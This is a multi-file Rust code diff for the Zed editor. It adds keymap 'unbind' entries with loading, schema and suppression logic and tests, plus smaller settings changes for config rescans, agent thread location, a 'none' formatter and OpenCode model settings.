+ Err(err) => {
+ let mut lines = err.lines();
+ let mut indented_err = lines.next().unwrap().to_string();
+ for line in lines {
+ indented_err.push_str(" ");
+ indented_err.push_str(line);
+ indented_err.push_str("\n");
+ }
+ write!(
+ section_errors,
+ "\n\n- In unbind {}, {indented_err}",
+ MarkdownInlineCode(&format!("\"{}\"", keystrokes))
+ )
+ .unwrap();
+ }
+ }
+ }
+ }
+
if let Some(bindings) = bindings {
for (keystrokes, action) in bindings {
let result = Self::load_keybinding(
@@ -296,7 +347,7 @@ impl KeymapFile {
}
if !section_errors.is_empty() {
- errors.push((context, section_errors))
+ errors.push((context.clone(), section_errors))
}
}
@@ -332,7 +383,17 @@ impl KeymapFile {
use_key_equivalents: bool,
cx: &App,
) -> std::result::Result<KeyBinding, String> {
- let (action, action_input_string) = Self::build_keymap_action(action, cx)?;
+ Self::load_keybinding_action_value(keystrokes, &action.0, context, use_key_equivalents, cx)
+ }
+
+ fn load_keybinding_action_value(
+ keystrokes: &str,
+ action: &Value,
+ context: Option<Rc<KeyBindingContextPredicate>>,
+ use_key_equivalents: bool,
+ cx: &App,
+ ) -> std::result::Result<KeyBinding, String> {
+ let (action, action_input_string) = Self::build_keymap_action_value(action, cx)?;
let key_binding = match KeyBinding::load(
keystrokes,
@@ -362,23 +423,70 @@ impl KeymapFile {
}
}
+ fn load_unbinding(
+ keystrokes: &str,
+ action: &UnbindTargetAction,
+ context: Option<Rc<KeyBindingContextPredicate>>,
+ use_key_equivalents: bool,
+ cx: &App,
+ ) -> std::result::Result<KeyBinding, String> {
+ let key_binding = Self::load_keybinding_action_value(
+ keystrokes,
+ &action.0,
+ context,
+ use_key_equivalents,
+ cx,
+ )?;
+
+ if key_binding.action().partial_eq(&NoAction) {
+ return Err("expected action name string or [name, input] array.".to_string());
+ }
+
+ if key_binding.action().name() == Unbind::name_for_type() {
+ return Err(format!(
+ "can't use {} as an unbind target.",
+ MarkdownInlineCode(&format!("\"{}\"", Unbind::name_for_type()))
+ ));
+ }
+
+ KeyBinding::load(
+ keystrokes,
+ Box::new(Unbind(key_binding.action().name().into())),
+ key_binding.predicate(),
+ use_key_equivalents,
+ key_binding.action_input(),
+ cx.keyboard_mapper().as_ref(),
+ )
+ .map_err(|InvalidKeystrokeError { keystroke }| {
+ format!(
+ "invalid keystroke {}. {}",
+ MarkdownInlineCode(&format!("\"{}\"", &keystroke)),
+ KEYSTROKE_PARSE_EXPECTED_MESSAGE
+ )
+ })
+ }
+
pub fn parse_action(
action: &KeymapAction,
) -> Result<Option<(&String, Option<&Value>)>, String> {
- let name_and_input = match &action.0 {
+ Self::parse_action_value(&action.0)
+ }
+
+ fn parse_action_value(action: &Value) -> Result<Option<(&String, Option<&Value>)>, String> {
+ let name_and_input = match action {
Value::Array(items) => {
if items.len() != 2 {
return Err(format!(
"expected two-element array of `[name, input]`. \
Instead found {}.",
- MarkdownInlineCode(&action.0.to_string())
+ MarkdownInlineCode(&action.to_string())
));
}
let serde_json::Value::String(ref name) = items[0] else {
return Err(format!(
"expected two-element array of `[name, input]`, \
but the first element is not a string in {}.",
- MarkdownInlineCode(&action.0.to_string())
+ MarkdownInlineCode(&action.to_string())
));
};
Some((name, Some(&items[1])))
@@ -389,7 +497,7 @@ impl KeymapFile {
return Err(format!(
"expected two-element array of `[name, input]`. \
Instead found {}.",
- MarkdownInlineCode(&action.0.to_string())
+ MarkdownInlineCode(&action.to_string())
));
}
};
@@ -400,7 +508,14 @@ impl KeymapFile {
action: &KeymapAction,
cx: &App,
) -> std::result::Result<(Box<dyn Action>, Option<String>), String> {
- let (build_result, action_input_string) = match Self::parse_action(action)? {
+ Self::build_keymap_action_value(&action.0, cx)
+ }
+
+ fn build_keymap_action_value(
+ action: &Value,
+ cx: &App,
+ ) -> std::result::Result<(Box<dyn Action>, Option<String>), String> {
+ let (build_result, action_input_string) = match Self::parse_action_value(action)? {
Some((name, action_input)) if name.as_str() == ActionSequence::name_for_type() => {
match action_input {
Some(action_input) => (
@@ -583,9 +698,15 @@ impl KeymapFile {
"minItems": 2,
"maxItems": 2
});
- let mut keymap_action_alternatives = vec![empty_action_name, empty_action_name_with_input];
+ let mut keymap_action_alternatives = vec![
+ empty_action_name.clone(),
+ empty_action_name_with_input.clone(),
+ ];
+ let mut unbind_target_action_alternatives =
+ vec![empty_action_name, empty_action_name_with_input];
let mut empty_schema_action_names = vec![];
+ let mut empty_schema_unbind_target_action_names = vec![];
for (name, action_schema) in action_schemas.into_iter() {
let deprecation = if name == NoAction.name() {
Some("null")
@@ -593,6 +714,9 @@ impl KeymapFile {
deprecations.get(name).copied()
};
+ let include_in_unbind_target_schema =
+ name != NoAction.name() && name != Unbind::name_for_type();
+
// Add an alternative for plain action names.
let mut plain_action = json_schema!({
"type": "string",
@@ -607,7 +731,10 @@ impl KeymapFile {
if let Some(description) = &description {
add_description(&mut plain_action, description);
}
- keymap_action_alternatives.push(plain_action);
+ keymap_action_alternatives.push(plain_action.clone());
+ if include_in_unbind_target_schema {
+ unbind_target_action_alternatives.push(plain_action);
+ }
// Add an alternative for actions with data specified as a [name, data] array.
//
@@ -633,9 +760,15 @@ impl KeymapFile {
"minItems": 2,
"maxItems": 2
});
- keymap_action_alternatives.push(action_with_input);
+ keymap_action_alternatives.push(action_with_input.clone());
+ if include_in_unbind_target_schema {
+ unbind_target_action_alternatives.push(action_with_input);
+ }
} else {
empty_schema_action_names.push(name);
+ if include_in_unbind_target_schema {
+ empty_schema_unbind_target_action_names.push(name);
+ }
}
}
@@ -659,20 +792,44 @@ impl KeymapFile {
keymap_action_alternatives.push(actions_with_empty_input);
}
+ if !empty_schema_unbind_target_action_names.is_empty() {
+ let action_names = json_schema!({ "enum": empty_schema_unbind_target_action_names });
+ let no_properties_allowed = json_schema!({
+ "type": "object",
+ "additionalProperties": false
+ });
+ let mut actions_with_empty_input = json_schema!({
+ "type": "array",
+ "items": [action_names, no_properties_allowed],
+ "minItems": 2,
+ "maxItems": 2
+ });
+ add_deprecation(
+ &mut actions_with_empty_input,
+ "This action does not take input - just the action name string should be used."
+ .to_string(),
+ );
+ unbind_target_action_alternatives.push(actions_with_empty_input);
+ }
+
// Placing null first causes json-language-server to default assuming actions should be
// null, so place it last.
keymap_action_alternatives.push(json_schema!({
"type": "null"
}));
- // The `KeymapSection` schema will reference the `KeymapAction` schema by name, so setting
- // the definition of `KeymapAction` results in the full action schema being used.
generator.definitions_mut().insert(
KeymapAction::schema_name().to_string(),
json!({
"anyOf": keymap_action_alternatives
}),
);
+ generator.definitions_mut().insert(
+ UnbindTargetAction::schema_name().to_string(),
+ json!({
+ "anyOf": unbind_target_action_alternatives
+ }),
+ );
generator.root_schema_for::<KeymapFile>().to_value()
}
@@ -701,31 +858,32 @@ impl KeymapFile {
tab_size: usize,
keyboard_mapper: &dyn gpui::PlatformKeyboardMapper,
) -> Result<String> {
- match operation {
+ // When replacing or removing a non-user binding, we may need to write an unbind entry
+ // to suppress the original default binding.
+ let mut suppression_unbind: Option<KeybindUpdateTarget<'_>> = None;
+
+ match &operation {
// if trying to replace a keybinding that is not user-defined, treat it as an add operation
KeybindUpdateOperation::Replace {
target_keybind_source: target_source,
source,
target,
- } if target_source != KeybindSource::User => {
+ } if *target_source != KeybindSource::User => {
+ if target.keystrokes_unparsed() != source.keystrokes_unparsed() {
+ suppression_unbind = Some(target.clone());
+ }
operation = KeybindUpdateOperation::Add {
- source,
- from: Some(target),
+ source: source.clone(),
+ from: Some(target.clone()),
};
}
- // if trying to remove a keybinding that is not user-defined, treat it as creating a binding
- // that binds it to `zed::NoAction`
+ // if trying to remove a keybinding that is not user-defined, treat it as creating an
+ // unbind entry for the removed action
KeybindUpdateOperation::Remove {
target,
target_keybind_source,
- } if target_keybind_source != KeybindSource::User => {
- let mut source = target.clone();
- source.action_name = gpui::NoAction.name();
- source.action_arguments.take();
- operation = KeybindUpdateOperation::Add {
- source,
- from: Some(target),
- };
+ } if *target_keybind_source != KeybindSource::User => {
+ suppression_unbind = Some(target.clone());
}
_ => {}
}
@@ -734,34 +892,41 @@ impl KeymapFile {
// We don't want to modify the file if it's invalid.
let keymap = Self::parse(&keymap_contents).context("Failed to parse keymap")?;
- if let KeybindUpdateOperation::Remove { target, .. } = operation {
- let target_action_value = target
- .action_value()
- .context("Failed to generate target action JSON value")?;
- let Some((index, keystrokes_str)) =
- find_binding(&keymap, &target, &target_action_value, keyboard_mapper)
- else {
- anyhow::bail!("Failed to find keybinding to remove");
- };
- let is_only_binding = keymap.0[index]
- .bindings
- .as_ref()
- .is_none_or(|bindings| bindings.len() == 1);
- let key_path: &[&str] = if is_only_binding {
- &[]
- } else {
- &["bindings", keystrokes_str]
- };
- let (replace_range, replace_value) = replace_top_level_array_value_in_json_text(
- &keymap_contents,
- key_path,
- None,
- None,
- index,
- tab_size,
- );
- keymap_contents.replace_range(replace_range, &replace_value);
- return Ok(keymap_contents);
+ if let KeybindUpdateOperation::Remove {
+ target,
+ target_keybind_source,
+ } = &operation
+ {
+ if *target_keybind_source == KeybindSource::User {
+ let target_action_value = target
+ .action_value()
+ .context("Failed to generate target action JSON value")?;
+ let Some(binding_location) =
+ find_binding(&keymap, target, &target_action_value, keyboard_mapper)
+ else {
+ anyhow::bail!("Failed to find keybinding to remove");
+ };
+ let is_only_binding = binding_location.is_only_entry_in_section(&keymap);
+ let key_path: &[&str] = if is_only_binding {
+ &[]
+ } else {
+ &[
+ binding_location.kind.key_path(),
+ binding_location.keystrokes_str,
+ ]
+ };
+ let (replace_range, replace_value) = replace_top_level_array_value_in_json_text(
+ &keymap_contents,
+ key_path,
+ None,
+ None,
+ binding_location.index,
+ tab_size,
+ );
+ keymap_contents.replace_range(replace_range, &replace_value);
+
+ return Ok(keymap_contents);
+ }
}
if let KeybindUpdateOperation::Replace { source, target, .. } = operation {
@@ -772,7 +937,7 @@ impl KeymapFile {
.action_value()
.context("Failed to generate source action JSON value")?;
- if let Some((index, keystrokes_str)) =
+ if let Some(binding_location) =
find_binding(&keymap, &target, &target_action_value, keyboard_mapper)
{
if target.context == source.context {
@@ -781,30 +946,32 @@ impl KeymapFile {
let (replace_range, replace_value) = replace_top_level_array_value_in_json_text(
&keymap_contents,
- &["bindings", keystrokes_str],
+ &[
+ binding_location.kind.key_path(),
+ binding_location.keystrokes_str,
+ ],
Some(&source_action_value),
Some(&source.keystrokes_unparsed()),
- index,
+ binding_location.index,
tab_size,
);
keymap_contents.replace_range(replace_range, &replace_value);
return Ok(keymap_contents);
- } else if keymap.0[index]
- .bindings
- .as_ref()
- .is_none_or(|bindings| bindings.len() == 1)
- {
+ } else if binding_location.is_only_entry_in_section(&keymap) {
// if we are replacing the only binding in the section,
// just update the section in place, updating the context
// and the binding
let (replace_range, replace_value) = replace_top_level_array_value_in_json_text(
&keymap_contents,
- &["bindings", keystrokes_str],
+ &[
+ binding_location.kind.key_path(),
+ binding_location.keystrokes_str,
+ ],
Some(&source_action_value),
Some(&source.keystrokes_unparsed()),
- index,
+ binding_location.index,
tab_size,
);
keymap_contents.replace_range(replace_range, &replace_value);
@@ -814,7 +981,7 @@ impl KeymapFile {
&["context"],
source.context.map(Into::into).as_ref(),
None,
- index,
+ binding_location.index,
tab_size,
);
keymap_contents.replace_range(replace_range, &replace_value);
@@ -827,10 +994,13 @@ impl KeymapFile {
let (replace_range, replace_value) = replace_top_level_array_value_in_json_text(
&keymap_contents,
- &["bindings", keystrokes_str],
+ &[
+ binding_location.kind.key_path(),
+ binding_location.keystrokes_str,
+ ],
None,
None,
- index,
+ binding_location.index,
tab_size,
);
keymap_contents.replace_range(replace_range, &replace_value);
@@ -865,8 +1035,9 @@ impl KeymapFile {
}
let use_key_equivalents = from.and_then(|from| {
let action_value = from.action_value().context("Failed to serialize action value. `use_key_equivalents` on new keybinding may be incorrect.").log_err()?;
- let (index, _) = find_binding(&keymap, &from, &action_value, keyboard_mapper)?;
- Some(keymap.0[index].use_key_equivalents)
+ let binding_location =
+ find_binding(&keymap, &from, &action_value, keyboard_mapper)?;
+ Some(keymap.0[binding_location.index].use_key_equivalents)
}).unwrap_or(false);
if use_key_equivalents {
value.insert("use_key_equivalents".to_string(), true.into());
@@ -886,6 +1057,28 @@ impl KeymapFile {
);
keymap_contents.replace_range(replace_range, &replace_value);
}
+
+ if let Some(suppression_unbind) = suppression_unbind {
+ let mut value = serde_json::Map::with_capacity(2);
+ if let Some(context) = suppression_unbind.context {
+ value.insert("context".to_string(), context.into());
+ }
+ value.insert("unbind".to_string(), {
+ let mut unbind = serde_json::Map::new();
+ unbind.insert(
+ suppression_unbind.keystrokes_unparsed(),
+ suppression_unbind.action_value()?,
+ );
+ unbind.into()
+ });
+ let (replace_range, replace_value) = append_top_level_array_value_in_json_text(
+ &keymap_contents,
+ &value.into(),
+ tab_size,
+ );
+ keymap_contents.replace_range(replace_range, &replace_value);
+ }
+
return Ok(keymap_contents);
fn find_binding<'a, 'b>(
@@ -893,7 +1086,7 @@ impl KeymapFile {
target: &KeybindUpdateTarget<'a>,
target_action_value: &Value,
keyboard_mapper: &dyn gpui::PlatformKeyboardMapper,
- ) -> Option<(usize, &'b str)> {
+ ) -> Option<BindingLocation<'b>> {
let target_context_parsed =
KeyBindingContextPredicate::parse(target.context.unwrap_or("")).ok();
for (index, section) in keymap.sections().enumerate() {
@@ -902,40 +1095,108 @@ impl KeymapFile {
if section_context_parsed != target_context_parsed {
continue;
}
- let Some(bindings) = §ion.bindings else {
+
+ if let Some(binding_location) = find_binding_in_entries(
+ section.bindings.as_ref(),
+ BindingKind::Binding,
+ index,
+ target,
+ target_action_value,
+ keyboard_mapper,
+ |action| &action.0,
+ ) {
+ return Some(binding_location);
+ }
+
+ if let Some(binding_location) = find_binding_in_entries(
+ section.unbind.as_ref(),
+ BindingKind::Unbind,
+ index,
+ target,
+ target_action_value,
+ keyboard_mapper,
+ |action| &action.0,
+ ) {
+ return Some(binding_location);
+ }
+ }
+ None
+ }
+
+ fn find_binding_in_entries<'a, 'b, T>(
+ entries: Option<&'b IndexMap<String, T>>,
+ kind: BindingKind,
+ index: usize,
+ target: &KeybindUpdateTarget<'a>,
+ target_action_value: &Value,
+ keyboard_mapper: &dyn gpui::PlatformKeyboardMapper,
+ action_value: impl Fn(&T) -> &Value,
+ ) -> Option<BindingLocation<'b>> {
+ let entries = entries?;
+ for (keystrokes_str, action) in entries {
+ let Ok(keystrokes) = keystrokes_str
+ .split_whitespace()
+ .map(|source| {
+ let keystroke = Keystroke::parse(source)?;
+ Ok(KeybindingKeystroke::new_with_mapper(
+ keystroke,
+ false,
+ keyboard_mapper,
+ ))
+ })
+ .collect::<Result<Vec<_>, InvalidKeystrokeError>>()
+ else {
continue;
};
- for (keystrokes_str, action) in bindings {
- let Ok(keystrokes) = keystrokes_str
- .split_whitespace()
- .map(|source| {
- let keystroke = Keystroke::parse(source)?;
- Ok(KeybindingKeystroke::new_with_mapper(
- keystroke,
- false,
- keyboard_mapper,
- ))
- })
- .collect::<Result<Vec<_>, InvalidKeystrokeError>>()
- else {
- continue;
- };
- if keystrokes.len() != target.keystrokes.len()
- || !keystrokes
- .iter()
- .zip(target.keystrokes)
- .all(|(a, b)| a.inner().should_match(b))
- {
- continue;
- }
- if &action.0 != target_action_value {
- continue;
- }
- return Some((index, keystrokes_str));
+ if keystrokes.len() != target.keystrokes.len()
+ || !keystrokes
+ .iter()
+ .zip(target.keystrokes)
+ .all(|(a, b)| a.inner().should_match(b))
+ {
+ continue;
}
+ if action_value(action) != target_action_value {
+ continue;
+ }
+ return Some(BindingLocation {
+ index,
+ kind,
+ keystrokes_str,
+ });
}
None
}
+
+ #[derive(Copy, Clone)]
+ enum BindingKind {
+ Binding,
+ Unbind,
+ }
+
+ impl BindingKind {
+ fn key_path(self) -> &'static str {
+ match self {
+ Self::Binding => "bindings",
+ Self::Unbind => "unbind",
+ }
+ }
+ }
+
+ struct BindingLocation<'a> {
+ index: usize,
+ kind: BindingKind,
+ keystrokes_str: &'a str,
+ }
+
+ impl BindingLocation<'_> {
+ fn is_only_entry_in_section(&self, keymap: &KeymapFile) -> bool {
+ let section = &keymap.0[self.index];
+ let binding_count = section.bindings.as_ref().map_or(0, IndexMap::len);
+ let unbind_count = section.unbind.as_ref().map_or(0, IndexMap::len);
+ binding_count + unbind_count == 1
+ }
+ }
}
}
@@ -1228,7 +1489,8 @@ impl Action for ActionSequence {
#[cfg(test)]
mod tests {
- use gpui::{DummyKeyboardMapper, KeybindingKeystroke, Keystroke};
+ use gpui::{Action, App, DummyKeyboardMapper, KeybindingKeystroke, Keystroke, Unbind};
+ use serde_json::Value;
use unindent::Unindent;
use crate::{
@@ -1236,6 +1498,8 @@ mod tests {
keymap_file::{KeybindUpdateOperation, KeybindUpdateTarget},
};
+ gpui::actions!(test_keymap_file, [StringAction, InputAction]);
+
#[test]
fn can_deserialize_keymap_with_trailing_comma() {
let json = indoc::indoc! {"[
@@ -1251,6 +1515,191 @@ mod tests {
KeymapFile::parse(json).unwrap();
}
+ #[gpui::test]
+ fn keymap_section_unbinds_are_loaded_before_bindings(cx: &mut App) {
+ let key_bindings = match KeymapFile::load(
+ indoc::indoc! {r#"
+ [
+ {
+ "unbind": {
+ "ctrl-a": "test_keymap_file::StringAction",
+ "ctrl-b": ["test_keymap_file::InputAction", {}]
+ },
+ "bindings": {
+ "ctrl-c": "test_keymap_file::StringAction"
+ }
+ }
+ ]
+ "#},
+ cx,
+ ) {
+ crate::keymap_file::KeymapFileLoadResult::Success { key_bindings } => key_bindings,
+ crate::keymap_file::KeymapFileLoadResult::SomeFailedToLoad {
+ error_message, ..
+ } => {
+ panic!("{error_message}");
+ }
+ crate::keymap_file::KeymapFileLoadResult::JsonParseFailure { error } => {
+ panic!("JSON parse error: {error}");
+ }
+ };
+
+ assert_eq!(key_bindings.len(), 3);
+ assert!(
+ key_bindings[0]
+ .action()
+ .partial_eq(&Unbind("test_keymap_file::StringAction".into()))
+ );
+ assert_eq!(key_bindings[0].action_input(), None);
+ assert!(
+ key_bindings[1]
+ .action()
+ .partial_eq(&Unbind("test_keymap_file::InputAction".into()))
+ );
+ assert_eq!(
+ key_bindings[1]
+ .action_input()
+ .as_ref()
+ .map(ToString::to_string),
+ Some("{}".to_string())
+ );
+ assert_eq!(
+ key_bindings[2].action().name(),
+ "test_keymap_file::StringAction"
+ );
+ }
+
+ #[gpui::test]
+ fn keymap_unbind_loads_valid_target_action_with_input(cx: &mut App) {
+ let key_bindings = match KeymapFile::load(
+ indoc::indoc! {r#"
+ [
+ {
+ "unbind": {
+ "ctrl-a": ["test_keymap_file::InputAction", {}]
+ }
+ }
+ ]
+ "#},
+ cx,
+ ) {
+ crate::keymap_file::KeymapFileLoadResult::Success { key_bindings } => key_bindings,
+ other => panic!("expected Success, got {other:?}"),
+ };
+
+ assert_eq!(key_bindings.len(), 1);
+ assert!(
+ key_bindings[0]
+ .action()
+ .partial_eq(&Unbind("test_keymap_file::InputAction".into()))
+ );
+ assert_eq!(
+ key_bindings[0]
+ .action_input()
+ .as_ref()
+ .map(ToString::to_string),
+ Some("{}".to_string())
+ );
+ }
+
+ #[gpui::test]
+ fn keymap_unbind_rejects_null(cx: &mut App) {
+ match KeymapFile::load(
+ indoc::indoc! {r#"
+ [
+ {
+ "unbind": {
+ "ctrl-a": null
+ }
+ }
+ ]
+ "#},
+ cx,
+ ) {
+ crate::keymap_file::KeymapFileLoadResult::SomeFailedToLoad {
+ key_bindings,
+ error_message,
+ } => {
+ assert!(key_bindings.is_empty());
+ assert!(
+ error_message
+ .0
+ .contains("expected action name string or [name, input] array.")
+ );
+ }
+ other => panic!("expected SomeFailedToLoad, got {other:?}"),
+ }
+ }
+
+ #[gpui::test]
+ fn keymap_unbind_rejects_unbind_action(cx: &mut App) {
+ match KeymapFile::load(
+ indoc::indoc! {r#"
+ [
+ {
+ "unbind": {
+ "ctrl-a": ["zed::Unbind", "test_keymap_file::StringAction"]
+ }
+ }
+ ]
+ "#},
+ cx,
+ ) {
+ crate::keymap_file::KeymapFileLoadResult::SomeFailedToLoad {
+ key_bindings,
+ error_message,
+ } => {
+ assert!(key_bindings.is_empty());
+ assert!(
+ error_message
+ .0
+ .contains("can't use `\"zed::Unbind\"` as an unbind target.")
+ );
+ }
+ other => panic!("expected SomeFailedToLoad, got {other:?}"),
+ }
+ }
+
+ #[test]
+ fn keymap_schema_for_unbind_excludes_null_and_unbind_action() {
+ fn schema_allows(schema: &Value, expected: &Value) -> bool {
+ match schema {
+ Value::Object(object) => {
+ if object.get("const") == Some(expected) {
+ return true;
+ }
+ if object.get("type") == Some(&Value::String("null".to_string()))
+ && expected == &Value::Null
+ {
+ return true;
+ }
+ object.values().any(|value| schema_allows(value, expected))
+ }
+ Value::Array(items) => items.iter().any(|value| schema_allows(value, expected)),
+ _ => false,
+ }
+ }
+
+ let schema = KeymapFile::generate_json_schema_from_inventory();
+ let unbind_schema = schema
+ .pointer("/$defs/UnbindTargetAction")
+ .expect("missing UnbindTargetAction schema");
+
+ assert!(!schema_allows(unbind_schema, &Value::Null));
+ assert!(!schema_allows(
+ unbind_schema,
+ &Value::String(Unbind::name_for_type().to_string())
+ ));
+ assert!(schema_allows(
+ unbind_schema,
+ &Value::String("test_keymap_file::StringAction".to_string())
+ ));
+ assert!(schema_allows(
+ unbind_schema,
+ &Value::String("test_keymap_file::InputAction".to_string())
+ ));
+ }
+
#[track_caller]
fn check_keymap_update(
input: impl ToString,
@@ -1479,6 +1928,102 @@ mod tests {
}
]
}
+ },
+ {
+ "unbind": {
+ "ctrl-a": "zed::SomeAction"
+ }
+ }
+ ]"#
+ .unindent(),
+ );
+
+ // Replacing a non-user binding without changing the keystroke should
+ // not produce an unbind suppression entry.
+ check_keymap_update(
+ r#"[
+ {
+ "bindings": {
+ "ctrl-a": "zed::SomeAction"
+ }
+ }
+ ]"#
+ .unindent(),
+ KeybindUpdateOperation::Replace {
+ target: KeybindUpdateTarget {
+ keystrokes: &parse_keystrokes("ctrl-a"),
+ action_name: "zed::SomeAction",
+ context: None,
+ action_arguments: None,
+ },
+ source: KeybindUpdateTarget {
+ keystrokes: &parse_keystrokes("ctrl-a"),
+ action_name: "zed::SomeOtherAction",
+ context: None,
+ action_arguments: None,
+ },
+ target_keybind_source: KeybindSource::Base,
+ },
+ r#"[
+ {
+ "bindings": {
+ "ctrl-a": "zed::SomeAction"
+ }
+ },
+ {
+ "bindings": {
+ "ctrl-a": "zed::SomeOtherAction"
+ }
+ }
+ ]"#
+ .unindent(),
+ );
+
+ // Replacing a non-user binding with a context and a keystroke change
+ // should produce a suppression entry that preserves the context.
+ check_keymap_update(
+ r#"[
+ {
+ "context": "SomeContext",
+ "bindings": {
+ "ctrl-a": "zed::SomeAction"
+ }
+ }
+ ]"#
+ .unindent(),
+ KeybindUpdateOperation::Replace {
+ target: KeybindUpdateTarget {
+ keystrokes: &parse_keystrokes("ctrl-a"),
+ action_name: "zed::SomeAction",
+ context: Some("SomeContext"),
+ action_arguments: None,
+ },
+ source: KeybindUpdateTarget {
+ keystrokes: &parse_keystrokes("ctrl-b"),
+ action_name: "zed::SomeOtherAction",
+ context: Some("SomeContext"),
+ action_arguments: None,
+ },
+ target_keybind_source: KeybindSource::Default,
+ },
+ r#"[
+ {
+ "context": "SomeContext",
+ "bindings": {
+ "ctrl-a": "zed::SomeAction"
+ }
+ },
+ {
+ "context": "SomeContext",
+ "bindings": {
+ "ctrl-b": "zed::SomeOtherAction"
+ }
+ },
+ {
+ "context": "SomeContext",
+ "unbind": {
+ "ctrl-a": "zed::SomeAction"
+ }
}
]"#
.unindent(),
@@ -5,6 +5,61 @@ use futures::{StreamExt, channel::mpsc};
use gpui::{App, BackgroundExecutor, ReadGlobal};
use std::{path::PathBuf, sync::Arc, time::Duration};
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use fs::FakeFs;
+
+ use gpui::TestAppContext;
+ use serde_json::json;
+ use std::path::Path;
+
+ #[gpui::test]
+ async fn test_watch_config_dir_reloads_tracked_file_on_rescan(cx: &mut TestAppContext) {
+ cx.executor().allow_parking();
+
+ let fs = FakeFs::new(cx.background_executor.clone());
+ let config_dir = PathBuf::from("/root/config");
+ let settings_path = PathBuf::from("/root/config/settings.json");
+
+ fs.insert_tree(
+ Path::new("/root"),
+ json!({
+ "config": {
+ "settings.json": "A"
+ }
+ }),
+ )
+ .await;
+
+ let mut rx = watch_config_dir(
+ &cx.background_executor,
+ fs.clone(),
+ config_dir.clone(),
+ HashSet::from_iter([settings_path.clone()]),
+ );
+
+ assert_eq!(rx.next().await.as_deref(), Some("A"));
+ cx.run_until_parked();
+
+ fs.pause_events();
+ fs.insert_file(&settings_path, b"B".to_vec()).await;
+ fs.clear_buffered_events();
+
+ fs.emit_fs_event(&settings_path, Some(PathEventKind::Rescan));
+ fs.unpause_events_and_flush();
+ assert_eq!(rx.next().await.as_deref(), Some("B"));
+
+ fs.pause_events();
+ fs.insert_file(&settings_path, b"A".to_vec()).await;
+ fs.clear_buffered_events();
+
+ fs.emit_fs_event(&config_dir, Some(PathEventKind::Rescan));
+ fs.unpause_events_and_flush();
+ assert_eq!(rx.next().await.as_deref(), Some("A"));
+ }
+}
+
pub const EMPTY_THEME_NAME: &str = "empty-theme";
/// Settings for visual tests that use proper fonts instead of Courier.
@@ -139,8 +194,25 @@ pub fn watch_config_dir(
return;
}
}
+ Some(PathEventKind::Rescan) => {
+ for file_path in &config_paths {
+ let contents = fs.load(file_path).await.unwrap_or_default();
+ if tx.unbounded_send(contents).is_err() {
+ return;
+ }
+ }
+ }
_ => {}
}
+ } else if matches!(event.kind, Some(PathEventKind::Rescan))
+ && event.path == dir_path
+ {
+ for file_path in &config_paths {
+ let contents = fs.load(file_path).await.unwrap_or_default();
+ if tx.unbounded_send(contents).is_err() {
+ return;
+ }
+ }
}
}
}
@@ -793,6 +793,17 @@ impl SettingsStore {
edits
}
+ /// Mutates the default settings in place and recomputes all setting values.
+ pub fn update_default_settings(
+ &mut self,
+ cx: &mut App,
+ update: impl FnOnce(&mut SettingsContent),
+ ) {
+ let default_settings = Rc::make_mut(&mut self.default_settings);
+ update(default_settings);
+ self.recompute_values(None, cx);
+ }
+
/// Sets the default settings via a JSON string.
///
/// The string should contain a JSON object with a default value for every setting.
@@ -793,7 +793,12 @@ impl VsCodeSettings {
hide_root: None,
indent_guides: None,
indent_size: None,
- scrollbar: None,
+ scrollbar: self.read_bool("workbench.list.horizontalScrolling").map(
+ |horizontal_scrolling| ProjectPanelScrollbarSettingsContent {
+ show: None,
+ horizontal_scroll: Some(horizontal_scrolling),
+ },
+ ),
show_diagnostics: self
.read_bool("problems.decorations.enabled")
.and_then(|b| if b { Some(ShowDiagnostics::Off) } else { None }),
@@ -872,6 +877,7 @@ impl VsCodeSettings {
scrollbar: None,
scroll_multiplier: None,
toolbar: None,
+ show_count_badge: None,
})
}
@@ -9,6 +9,30 @@ use crate::ExtendingVec;
use crate::DockPosition;
+/// Where new threads should start by default.
+#[derive(
+ Clone,
+ Copy,
+ Debug,
+ Default,
+ PartialEq,
+ Eq,
+ Serialize,
+ Deserialize,
+ JsonSchema,
+ MergeFrom,
+ strum::VariantArray,
+ strum::VariantNames,
+)]
+#[serde(rename_all = "snake_case")]
+pub enum NewThreadLocation {
+ /// Start threads in the current project.
+ #[default]
+ LocalProject,
+ /// Start threads in a new worktree.
+ NewWorktree,
+}
+
#[with_fallible_options]
#[derive(Clone, PartialEq, Serialize, Deserialize, JsonSchema, MergeFrom, Debug, Default)]
pub struct AgentSettingsContent {
@@ -59,6 +83,10 @@ pub struct AgentSettingsContent {
///
/// Default: "thread"
pub default_view: Option<DefaultAgentView>,
+ /// Where new threads should start by default.
+ ///
+ /// Default: "local_project"
+ pub new_thread_location: Option<NewThreadLocation>,
/// The available agent profiles.
pub profiles: Option<IndexMap<Arc<str>, AgentProfileContent>>,
/// Where to show a popup notification when the agent is waiting for user input.
@@ -146,6 +174,10 @@ impl AgentSettingsContent {
self.default_profile = Some(profile_id);
}
+ pub fn set_new_thread_location(&mut self, value: NewThreadLocation) {
+ self.new_thread_location = Some(value);
+ }
+
pub fn add_favorite_model(&mut self, model: LanguageModelSelection) {
if !self.favorite_models.contains(&model) {
self.favorite_models.push(model);
@@ -955,6 +955,8 @@ pub enum Formatter {
/// or falling back to formatting via language server.
#[default]
Auto,
+ /// Do not format code.
+ None,
/// Format code using Zed's Prettier integration.
Prettier,
/// Format code using an external command.
@@ -1148,6 +1150,12 @@ mod test {
settings.formatter,
Some(FormatterList::Single(Formatter::Auto))
);
+ let raw_none = "{\"formatter\": \"none\"}";
+ let settings: LanguageSettingsContent = serde_json::from_str(raw_none).unwrap();
+ assert_eq!(
+ settings.formatter,
+ Some(FormatterList::Single(Formatter::None))
+ );
let raw = "{\"formatter\": \"language_server\"}";
let settings: LanguageSettingsContent = serde_json::from_str(raw).unwrap();
assert_eq!(
@@ -16,6 +16,7 @@ pub struct AllLanguageModelSettingsContent {
pub lmstudio: Option<LmStudioSettingsContent>,
pub mistral: Option<MistralSettingsContent>,
pub ollama: Option<OllamaSettingsContent>,
+ pub opencode: Option<OpenCodeSettingsContent>,
pub open_router: Option<OpenRouterSettingsContent>,
pub openai: Option<OpenAiSettingsContent>,
pub openai_compatible: Option<HashMap<Arc<str>, OpenAiCompatibleSettingsContent>>,
@@ -144,6 +145,24 @@ impl Default for KeepAlive {
}
}
+#[with_fallible_options]
+#[derive(Default, Clone, Debug, Serialize, Deserialize, PartialEq, JsonSchema, MergeFrom)]
+pub struct OpenCodeSettingsContent {
+ pub api_url: Option<String>,
+ pub available_models: Option<Vec<OpenCodeAvailableModel>>,
+}
+
+#[with_fallible_options]
